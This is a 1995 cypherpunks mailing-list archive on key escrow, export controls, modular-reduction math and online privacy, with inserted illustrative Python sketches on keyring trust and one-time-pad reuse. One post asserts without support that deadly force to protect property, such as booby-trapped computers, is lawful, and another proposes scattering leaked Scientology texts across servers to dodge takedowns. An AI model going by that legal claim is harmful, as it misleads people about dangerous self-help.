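    keys included before it started (assumption about how a pass works).
    """
    included = set(seeds)
    passes = []
    while True:
        snapshot = frozenset(included)
        added = {
            signer
            for signer, signed in signatures.items()
            if signer not in snapshot and signed & snapshot
        }
        passes.append(sorted(added))
        if not added:
            return included, passes
        included |= added


def expand_with_signed(signatures, included):
    """Keys certified by an included key but missing from the condensed ring:
    the group the post says its method leaves out."""
    extra = set()
    for signer in included:
        extra |= signatures.get(signer, set()) - included
    return extra


def is_related(signatures, included, key):
    """Update check for a submitted key: accept it only if it has signed an
    included key or an included key has signed it."""
    signs_included = bool(signatures.get(key, set()) & included)
    signed_by_included = any(key in signatures.get(s, set()) for s in included)
    return signs_included or signed_by_included


if __name__ == "__main__":
    ring, passes = signers_closure(SIGNATURES, {"SEED"})
    print("condensed ring:", sorted(ring))
    print("added per pass:", passes)
    # The final pass adds nothing, so the longest chain is len(passes) - 1.
    print("longest chain from a seed:", len(passes) - 1)
    print("left out but signed by ring:", sorted(expand_with_signed(SIGNATURES, ring)))
    for candidate in ("E", "G", "X"):
        print(candidate, "accepted on update:", is_related(SIGNATURES, ring, candidate))
```

The island keys X and Y never enter the ring unless one of them is used as a seed, which is the seed-dependence the post raises about the UNIMI keyring.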




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 09:34:06 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: not a flame please read and think about this
In-Reply-To: <Pine.SUN.3.91.950907074029.24168A-100000@crl.crl.com>
Message-ID: <199509071633.MAA04493@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy Sandfort writes:
> On Thu, 7 Sep 1995 an116512@anon.penet.fi wrote:
> 
> > why is it that half the people who post here work for the
> > government or big companies that are doing government's bidding
> > (rand.org (which is part of the nsa!) att.com (makers of the
> > clipper chip) mit (which owns rsa) netscape etc etc)
> 
> I doubt the statistics and I don't see how mere employment with
> the above somehow disqualifies one for having a regard for 
> privacy.

anonymous idiot doesn't even have his facts right. VLSI and Mykotronix
(sp?) make the EES chips. Rand doesn't do much NSA research (although
there are other companies that do) and MIT doesn't have any real
rights to RSA given the PKP agreements.

In any case, who gives a damn?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 7 Sep 95 12:51:50 PDT
To: cypherpunks@toad.com
Subject: Commercial Speech over Internet product
Message-ID: <9508078105.AA810503582@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's an article about a commercial company that is doing speech
over the Internet.  Maybe someone would like to help them add encryption.
                --Bob Baldwin, speaking for myself only.
    ------------------------
TrueSpeech Player enables real-time audio over Internet

SANTA CLARA, CALIFORNIA, U.S.A., 1995 SEP 1 (NB) -- DSP Group Inc. 
(NASDAQ:DSPG) announced a new Windows product, TrueSpeech Player, that is 
freely available on the Internet. The TrueSpeech Player enables TrueSpeech- 
encoded speech to be played in real-time over the Internet.

Kurt Magdanz, director of business development at DSP, told Newsbytes, "The 
TrueSpeech Player utilizes the TrueSpeech compression technology bundled in 
Microsoft's Windows 95 and Windows NT. True Speech is a very high quality 
algorithm which compresses speech. TrueSpeech 
Player allows users to decompress TrueSpeech in real time."

With the TrueSpeech compression algorithm, speech is communicated in real- 
time over standard telephone lines to computers capable of communicating at 
data rates of 14.4kbps (kilobits per second) or above, Newsbytes was told. 
Because the TrueSpeech Player converts compressed speech data in real-time, 
World Wide Web site visitors have access to high-quality speech over the 
Internet in real time, said Magdanz.

"The TrueSpeech Player is our first step in enabling high-quality speech 
communication in real-time over the Internet," said Yuval Cohen, vice 
president of business development with the DSP Group. "World Wide Web site 
and content developers can immediately begin developing TrueSpeech Player- 
compatible content without paying fees."

"Content developers who wish to create TrueSpeech Player-compatible speech 
content should visit our World Wide Web site for detailed instructions on 
how to use this new product," said Cohen.

DSP Group is currently developing an advanced TrueSpeech Server software 
package which will offer content developers tools, interaction with the 
TrueSpeech Player to enable advanced features, live broadcasting capability 
and enhanced server control with diagnostics, said Magdanz.

The TrueSpeech Player can be downloaded freely from DSP Group's World Wide 
Web site, http://www.dspg.com .

DSP is headquartered in Santa Clara, California.

(Richard Bowers/19950831/Press Contact: Kurt Magdanz, DSP, 408- 986-4300)

                





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Thu, 7 Sep 95 13:02:32 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509071959.MAA11919@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>"If keys are escrowed, what purpose does a 64 bit limit serve?"

This question was asked, it seems like a zillion times, but
probably no more than four or five times.

It is a bit of a belt and suspenders idea. But it also shows how
scared they are about real encryption.

It is clear that this meeting is a shame. Everyone in industry
says it won't be marketable. The Govies say it will be great.
What they really want is to force weak crypto on the US by
forcing the vendors to make a weak product "for export" when
all the vendors say that they have to have _only one_ version.
If they have one version, and it is weak, we are safe from
drug dealers, pedophiles and terrorists.

(BTW, I used that phrase yesterday, so it should be in the Federal
register's official record.)

>Secondarily, I observe that this apparently precludes the use of OTP.

No, they don't care about the cipher, only the key length,
But with a 64bit, GAK'd key, you can't say much without repeating
the P, and that makes it a TTP or a FTP (two time pad, or four time pad)
which isn't very useful.  You probably can gzip "attack at dawn" to
64 bits, but not much more.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrellA
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer
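
An added example, not part of the original message: a short Python sketch of why a pad capped at 64 bits stops being a one-time pad as soon as the message exceeds 8 bytes. The function names and the two keys are constructed for illustration; the plaintext is the "attack at dawn" string from the message above.

```python
"""Pad reuse under a 64-bit key limit (added example, constructed values)."""

BLOCK = 8  # 64-bit key, the length limit discussed in the thread


def xor_bytes(a, b):
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_repeating_pad(key, plaintext):
    """'One-time pad' with only 64 bits of pad: the pad repeats every 8 bytes."""
    if len(key) != BLOCK:
        raise ValueError("key must be exactly 64 bits")
    return bytes(p ^ key[i % BLOCK] for i, p in enumerate(plaintext))


def pad_uses(plaintext):
    """How many times the 64-bit pad is applied to this message
    (2 = two-time pad, 4 = four-time pad)."""
    return -(-len(plaintext) // BLOCK)


def block_xor_leak(ciphertext):
    """XOR of the first two ciphertext blocks. The pad cancels out, so the
    result equals the XOR of the two plaintext blocks for every key."""
    n = max(0, min(BLOCK, len(ciphertext) - BLOCK))
    return xor_bytes(ciphertext[:n], ciphertext[BLOCK:BLOCK + n])


if __name__ == "__main__":
    message = b"attack at dawn"                    # 14 bytes = 112 bits
    key_a = bytes(range(8))                        # constructed key
    key_b = bytes.fromhex("a1b2c3d4e5f60718")      # a different constructed key

    leak_a = block_xor_leak(encrypt_repeating_pad(key_a, message))
    leak_b = block_xor_leak(encrypt_repeating_pad(key_b, message))

    print("pad uses:", pad_uses(message))
    print("leak is key-independent:", leak_a == leak_b)
    # Anyone who knows or guesses the first block learns the second
    # without ever touching the escrowed key.
    print("second block from first:", xor_bytes(leak_a, message[:6]))
```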




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 7 Sep 95 13:10:00 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <v02120d18ac750fc7697b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



One good (non-cypherpunk) argument against GAK is that it
concentrates a very large quantity of valuable keys in a few
places, where they become an extremely attractive target for
government or corporate espionage.

You could compare this to the function served by banks, but
banks tend to notice fairly quickly when money is missing.
Compromising keys doesn't involve removing anything, or throw
the books out of balance; they just get copied. The compromise
is only revealed if they are used clumsily.

Note that a few million keys would fit very easily on even a
low-end DAT tape (easily hidden in a pack of cigarettes).











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 7 Sep 95 10:27:48 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509071535.LAA49458@tequesta.gate.net>
Message-ID: <Pine.SUN.3.91.950907132341.7591B-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Jim Ray wrote:

> >Even if we were in a more libertarian society you run the risk of
> >being boycotted by potential customers (of corse the analagy breaks
> >down somewhat, in a very libertarian society oyu might be able to
> >run a profatable ISP selling to the very nich market of people who
> >want to threten, harass, or generally make a nuicence of themselves).

> To "to threten, harass, or generally make a nuicence"[SIC] of himself,
> one must violate this pledge, and there would no-doubt still be legal
> results.

Clearly threats of violence are not considered legal by most 
libertarians, including the Libertarian Party of the US. 

Furthermore, there is no reason why an ISP has to connect to another 
ISP.  ISPs that do more harm than good may not be invited to participate 
in major switching centers.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: duncan@hasp.com (Duncan J Watson)
Date: Thu, 7 Sep 95 10:29:21 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <9509071332.ZM124@titan.hasp.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian,

Your question is very hard to answer as posed.  How is access granted?  To 
whom?  In what period of time?, etc.

The details are very important here as this is a very detail-oriented list.  
Also the details of implementation are where you may find the objections.  
Many plans sound grand when loosely described but fail due to small details.

My personal belief is that any mandatory key escrow system will be open to 
abuse by authority figures.  A solidly implemented key escrow service operated 
by smart privacy oriented private firms would benefit corporations and 
others engaged in cooperative development or other cooperative operations.  
Key escrow would keep the accountants and lawyers happy.  

Just my $0.02.
djw

On Sep 3,  9:25pm, Brian Davis wrote:
> Subject: Re: GAK
[stuff deleted]
> I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> however, if the "dislike" is because government would have access under 
> any circumstances or if the primary worry is that government will cheat 
> and get access when most would agree that they shouldn't (either by the 
> judge "cheating" or a TLA stealing it).
> 
> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??
> 
> EBD
> 
>-- End of excerpt from Brian Davis



-- 
Duncan J Watson                            Email:Duncan@hasp.com
Tech Support Manager/Sys Admin             Ph#:  +1 212 564 5678
Aladdin Software Security Inc              Fax#: +1 212 564 3377
:::finger Duncan@hasp.com for PGP key:::   http://www.aks.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 7 Sep 95 12:12:59 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <Pine.SUN.3.91.950907135630.13108A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Brian Davis wrote:

> I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> however, if the "dislike" is because government would have access under 
> any circumstances or if the primary worry is that government will cheat 
> and get access when most would agree that they shouldn't (either by the 
> judge "cheating" or a TLA stealing it).

...or "somebody else" (ie commercial competitor, personal or political 
rival, etc) paying off somebody to obtain it.  I don't trust the gvm't to 
only get access when they should, either.

> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??

Not necessarily; the members of the review board can be bribed, 
blackmailed, lied to, etc.  I don't believe there's a competent review 
board available...nor do I think such a thing could be created.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 7 Sep 95 21:47:47 PDT
To: cypherpunks@toad.com
Subject: Ring: Server problem
Message-ID: <199509072022.OAA00701@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

AAAAAAAAAAAKKKKKKKKK

My server has had problems with both incoming ftp and rz. Not only is it
very flakey, but they've mis-applied a timeout lately, meaning I have to
press a key every 10 minutes during ftp or the process gets killed. Oh,
and they did that just before becoming very busy.

I delayed announcing my keyring until I could physically transfer the
keyring by disk. After getting mail reporting it being corrupted, I had
to delete it. It's possible that when I mounted my disk, it could have
defaulted into an ascii conversion. I am currently trying to uuencode
the entire file and mail it to myself from my local machine. (Heh)

If that fails, the keyring will unfortunately not be available until
tomorrow, when I can physically transfer it.

Sorry for the delay.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME9UYcLa+QKZS485AQFiAAL/bOEgCAeQVPfIzaU3fbRzowK+Wh+lwgaY
TY/O9DssheM34qbQcaM3qx9/7Gv4J+kamvhNOgNPhInsQ9ZATKFFtfbPTKimH/jm
dP6g51WxbhdQV6mUdXoPT1z1yFAUPEiL
=HaPy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Thu, 7 Sep 95 11:46:16 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Collection of personal info
In-Reply-To: <199509071616.MAA04473@panix.com>
Message-ID: <Pine.SUN.3.91.950907142506.26768A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Duncan Frissell wrote:

> That's what's so nice about the nets.  You don't (won't) have to "live in the
> world" any more.  The creation of consensual hallucinations (virtual worlds)
> allows you to "change the world" at will.

Goody.  In this virtual world, we can also abolish all taxes, remove
all restrictions on crypto use, or even get rid of the government
altogether.  I just hope I can find enough food there.

> And once the interface improves...

...I won't have to deal with the inefficiencies of real sex, live
music performances, or (non-virtual) world travel ever again.

> Actually, the creation of separate "spaces" that can only be entered with
> your (each person's) permission will have a big impact on life in the real
> world.   

Yeah, it'll wipe it out.

I've got to tell you, Duncan, this kind of rhetoric pushes me over to
the luddite side more every day.

No flame intended--just one man's opinion.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Fabbri <tomservo@access.digex.net>
Date: Thu, 7 Sep 95 11:48:09 PDT
To: cypherpunks@toad.com
Subject: Re: Force Ratios
Message-ID: <199509071847.OAA08292@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> But the most interesting thing that this emphasized for me was the sort of
> modern information warfare issues as highlighted in the recent Economist
> Survey.  Info war is war by other means (a little shooting, communications,
> publicity, and litigation) and look what happened at Ruby Ridge.  The Feds
> deployed 400 "troopies", some armored personnel carriers, copters, executive
> jets, Hummers, and other hardware.  On the other side were 3 adults and 4
> children with some 14 personal weapons.
> 
> The result.  One Fed and two Weavers dead.  A $3.1 million legal settlement,
> and continuing problems for the Feds.  That smells like a bad defeat to me.
> They couldn't even kill 7 people with a 57 to 1 force ratio.

Well. I think if killing the Weaver clan was the primary objective, they
could have been much more direct. One plane, one bomb/missile, one pilot,
with a 1:7 force ratio (1:2 if you don't count probable noncombatants). Or
a SEAL team with tools to make it look like an "accident" (carbon
monoxide, maybe? A propane explosion?). However, we generally frown on
that kind of thing in our polite society. :-)

If the Feds had really wanted to kill the Weavers, it'd probably be called
"Ruby Crater" now. 

> In addition, the operation and the various investigations must have cost the
> Feds millions more.  (What *do* the Fibbies have to pay for those Ninja
> Hoods?)  And they lost.

Murphy's Law applies everywhere. Most likely they really wanted to take
Weaver and clan alive (and thought they could!), and the worst possible
things happened. (Surprisingly enough, government TLAs know all about the
concept of "bad press," and killing bystanders isn't SOP.)

> That suggests that the ability of The Great Enemy to overcome the sort of
> directed human activity of the frictionless markets we are building will be
> quite limited.

But they don't have to face you directly, just convince someone who
allegedly represents you that a "law" is necessary to "save you from
yourself" and to "keep our great country free and safe." Then you either
play ball, or you wind up with a bunch of balaclava-clad guys in your
bedroom one night, taking your computer and dragging you off. Maybe they 
don't get anything to convict you, but you still have to mount a costly 
defense.

What a great system, eh? Just like the Founding Fathers imagined.
- -- 
Scott Fabbri              MSTie #31643       tomservo@access.digex.net
"If I knew that a man was coming to my house with the conscious design
of doing me good, I should run for my life."  --Thoreau

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQB1AwUBME898OvEnOI8TfM9AQFLJQL9GV7+YWfPUtBKaF7qbny4KLz7DhxkSrEE
TIhCVRiDmuoSnqsUFpM4i4yDQqEJK5lOnxm7mwYyPrKku8Z1JB7SPG5Koq/Vt/QZ
UwOnYT0VRNydJVQpIWq7AgnBmIz2wRYe
=uMqt
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 7 Sep 95 12:24:56 PDT
To: cypherpunks@toad.com
Subject: Industry Slams Gov's Encryption Export Plan
Message-ID: <v02120d06ac74f2a3e1ad@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Thu, 07 Sep 1995 07:15:48
From: James Rapp <infocker@megaweb.com>
To: www-buyinfo@allegra.att.com, rpournel@hr.house.gov
Subject: Industry Slams Gov's Encryption Export Plan

I was at the 9/6 NIST session and this account is reasonably
accurate.  Even though a seemingly high percentage of
attendees indicated displeasure with current Administration
key escrow proposals, they seem hell bent on this path.
Further, the sense was that industry representatives were
basically invited as a simple window dressing maneuver.

The engaging Whitfield Diffie of Sun Microsystems did an
outstanding job of raising questions about the
Administration's proposal.

Today's session--"Desirable Characteristics for Key Escrow
Agents."


Jim Rapp, "give me more info"
CyberStrategies
Alexandria, Virginia



Via Newsbytes, Kennedy Maize 9/6/95 12:00 a.m.


WASHINGTON, D.C., -- The Clinton administration's new proposal
on export controls on encryption in software got a tongue
lashing from the software industry today. The administration's
announcement of a so-called liberalization "suggests that the
government is pursuing a 'son of Clipper' strategy that could
lead to the mandatory use of government designed key escrow
encryption," said Robert Holleyman, president of the Business
Software Alliance.

Speaking at a conference sponsored by the National Institute
of Standards and Technology, Holleyman said the administration
plan to allow export only if the encryption scheme involves
key escrow reveals "a misunderstanding of the marketplace and
unless significantly changed, will prevent key escrow
encryption from ever being commercially adopted."

The White House initiative, Holleyman said, "failed to provide
immediate relief to software companies because it did nothing
to liberalize export controls on generally available software
employing non-key escrow encryption.

"Each delay by the administration in permitting the export of
software with strong encryption capabilities results in lost
sales for American companies," said Holleyman. "Ironically,
foreign software competitors, unconstrained by export
controls, continue to fill this void, with more than
200 foreign encryption programs available from 21 countries."

Under the new administration proposal, software companies that
employ non-key escrow encryption would continue to be limited
to a 40-bit key. Holleyman called for the administration
to immediately permit 56-bit encryption without key escrow,
which he said is the current world
standard.

Last year, the administration was pushing a hardware-software
approach to encryption, called the Clipper chip, which would
have employed government-designated escrow agents to hold
keys. Law enforcement agencies would have been able to get
access to the keys from the escrow agents.

Of the administration proposal to loosen controls on key
escrow encryption, Holleyman said that "the administration's
inability to shake off the Clipper mind-set is effectively
precluding the adoption of realistic criteria for commercial
key recovery systems." Holleyman suggested that a
workable system must include strong encryption where users --
in the US and elsewhere -- are able to specify the key holder.

Current administration policy, Holleyman said, is jeopardizing
the "future of the global information infrastructure and
electronic commerce. Instead of paving the roads, the
administration has left in place roadblocks on the information
highway."

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 6 Sep 95 23:03:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070346.XAA14571@clark.net>
Message-ID: <199509070600.QAA11675@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Ray Cromwell and all other cypherpunks,

> Anyone ready to risk running a "Scientology .sig virus server"?
...
> In the same spirit of the "export-a-sig-PGP" system, why not break
> the CoS materials up into n pieces (each piece being 5-10 lines long)
...

I don't really follow the Co$ saga, but when I last looked it seemed
as though six lines (one of them the title) are sufficient for them
to be unhappy at you. If I remember correctly, those six lines said
to go to the zoo to practice telepathy with animals...

(No they didn't say *how*.)

So I don't know whether the "export-PGP-sig" system will be any use.

...
> To spread the risk around even more, I'd place the "piece server"
> on k different HTTP sites just so they can't raid them all. Even
> better would be to use a script on one master server to
...

master server = single point of pressure

> Cypherpunks oughta be able to figure out something to show those idiots
> why their actions are ultimately futile.

It always was, but do you have the money and the spirit to fight them?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBME6KSyxV6mvvBgf5AQFGTQQAhxXbnoS1EoxRGTHKAukZzRIYFGu++Zuq
2zywwlKSUdxFm9di914qembuEb8rGTwqUGagESjs3p2oZe9xKFHricSr0LFOeoSh
Vx+mioL1hEaBMzKBrMNAD4OA7lPi7EEzeEFSb589TgNqH5DBvYxMwfWNXCe5I/A1
WjHU0YqtiwU=
=gKJF
-----END PGP SIGNATURE-----

>: : >>: OT7-48
>: : >>: 1.   Find some plants, trees, etc., and communicate to them
>: : >>: individually until you know they received your communication.
>: : >>: 2.   Go to a zoo or a place with many types of life and communicate
>: : >>: with each of them until you know the communication is
>: : >>: received and, if possible, returned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 13:47:08 PDT
To: dmandl@panix.com
Subject: Re: Collection of personal info
Message-ID: <199509072046.QAA26704@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 9/7/95 -0400, dmandl@panix.com wrote:

>> And once the interface improves...
>
>...I won't have to deal with the inefficiencies of real sex, live
>music performances, or (non-virtual) world travel ever again.
>
>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission will have a big impact on life in the real
>> world.   

Dave.  Sorry you didn't catch the implied change of tone in the above.  I
meant to show a switch from Space Cadet rhetoric about the nets to a more
realistic view. 

>> And once the interface improves...

>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission

These separate spaces won't wipe out the Real World (used with permission)
but they will influence it as a form of private property that is self
enforcing neither dependent on force for protection nor capable of being
penetrated by force.  This is a BIG THING.  You can't live in it yet but you
will certainly be able to trade digital goods and services there and stash
digital goods (work product, databases, etc.).

Having a place that is under your exclusive control has enormous practical
and psychological implications.  Think of the change that occurred when
peasants came to be able to own land.  Cyberspace contains spaces that can
be cheaply created, individually owned, and free of confiscation.  And since
the bulk of the wealth of OECD countries is non-physical (consisting of
various forms of ownership rights and "choses in action") that wealth can be
protected cryptographically.

>I've got to tell you, Duncan, this kind of rhetoric pushes me over to
>the luddite side more every day.
>
>No flame intended--just one man's opinion.

Don't you like the idea of a "place" that's yours alone?  It's not dangerous
(to you).  It increases your choices.  Your power.

DCF

"You don't have to be nice to nation states you meet on the way up if you're
not coming back down."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Sep 95 13:42:48 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509072042.AA20013@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> >"If keys are escrowed, what purpose does a 64 bit limit serve?"

> This question was asked, it seems like a zillion times, but
> probably no more than four or five times.
 
> It is a bit of a belt and suspenders idea. But it also shows how
> scared they are about real encryption.

Is there an actual quote - did an identifiable government person actually 
use the 'belt and suspenders' line? This is getting to the point where 
journalists could have something to hang a story on.

I think we can infer from this that the USG has, or soon expects to have, 
the ability to brute 64 bits of key.

> It is clear that this meeting is a shame. Everyone in industry
                                                           ^^^^^^^^
A shame certainly, but I suspect you meant 'sham' (not a spelling flame, 
the difference in meaning is important).
 
> Pat
>

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 7 Sep 95 16:47:38 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: fast modular reduction
In-Reply-To: <199509070811.EAA07559@clark.net>
Message-ID: <Pine.SUN.3.91.950907131638.6760C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>  Anyway, I played around with the algorithm a little, and it's neat
> and easy to implement, but the speed increase is not worth
> the patent hassle (assuming there is a speed increase, I saw none)
> 
>   The algorithm is still basically O(n^2) if used in a modexp
> routine. It requires n^2 multiplications and additions. Whereas,
> a typical Karatsuba multiplication using a high precision
> reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8
> additions. (for n=64 which is a 2048-bit number being reduced, 
> it's about 1/5 the multiplications, but 5 times the additions)

I agree with you that the patent hassle is probably not worth the speed 
increase.  If I came up with the algorithm by myself and on my own time, 
I certainly would not have filed a patent for it, but that wasn't the 
case.  I also agree that the patent system should be abolished, but there 
is nothing I can do about that either.

The speed increase does exist over Montgomery's modular reduction 
because it uses n*n multiplications and 1 division compared to n*(n+1) 
multiplications, and the pre- and post-calculations are much simpler.

Division using Karatsuba multiplication does seem to have a better 
asymptote, but is probably slower for most practical lengths.  Both 
Lenstra's LIP and Lacy's CryptLib use Montgomery for modular reduction.

The numbers you give are a bit off.  Assuming a 32-bit machine,
n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. 
Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications
rather than 1/5. 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 7 Sep 95 13:52:40 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SV4.3.91.950907165123.21790q-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I am pretty sure that it is lawful to use deadly force to protect 
property, in New Mexico.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 7 Sep 95 08:00:41 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509071459.AA01801@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)




To do a proof I rewrite the algorithm:



n = len(modulus)                   // modulus < B^n

Y = X                              // obviously Y = X mod modulus


K =  B ^ (n+1) - U                 // U = B ^ (n+1) mod modulus,
                                   // therefore K = 0 mod modulus
				   // furthermore K > 0


for (i=len(Y)-1 ; i>n  ;  i--)
 {

   F = B ^ (i-n-1) * K             // F > 0
                                   // F = 0 mod modulus

   Y -=  Y[i] * F                  // Y shrinking, but
                                   // Y still the same mod modulus


   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus

 }


This shows that Y was shrinking, but is still equal to X mod modulus.









To see whether Y really shrinks enough:

  Y = sum(i=0..len(Y)-1)  Y[i] * B^i


In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what
could be done fast by reducing the length of Y). 

  Now  Y < B^i





Afterwards the same value mod modulus is added to keep Y constant: 

  Y = Y + Y[i] * U * B^(i-n-1).


  Y[i]<B   ->  Y[i]+1  <= B
  
  U < modulus < B^n , therefore U < B^n

  ->    (Y[i]+1) * U < B * B^n  = B^(n+1)

  ->    Y[i] * U  < B^(n+1) - U

  ->    Y[i] * U *  B^ (i-n-1 )  < F




  Therefore after doing the addition

    Y < B^i + F




  Check of the last step:

  0 <= U < B^n therefore 

  B^n  <  B^(n+1) - U  <= B^(n+1)

  Therefore in every loop


  B^(i-1) < F <= B^i


  ->   Y-F  < B^i



Partial Correctness:






Y = X                              [ Y = X mod 
                                     Y < B^len(X) ]


K =  B ^ (n+1) - U                 [ K = 0 mod
                                     
                                     B^n < K <= B^(n+1) ]                
                                   
				   


for (i=len(X)-1 ; i>n  ;  i--)
 {
        [ Y = X mod  ,  Y < B^(i+1) ]


   F = B ^ (i-n-1) * K 
   
        [ F = 0 mod  ,   B^(i-1) < F <= B^i  ]

        [ 0 <= Y[i] < B ]

        [ Y[i] * F  = 0 mod ,
          0 <= Y[i] * F  < B^(i+1) ]


        [ Y >= Y[i] * B^i  ->  Y >= Y[i] * F ]

   Y -=  Y[i] * F

        [ Y = X mod ,
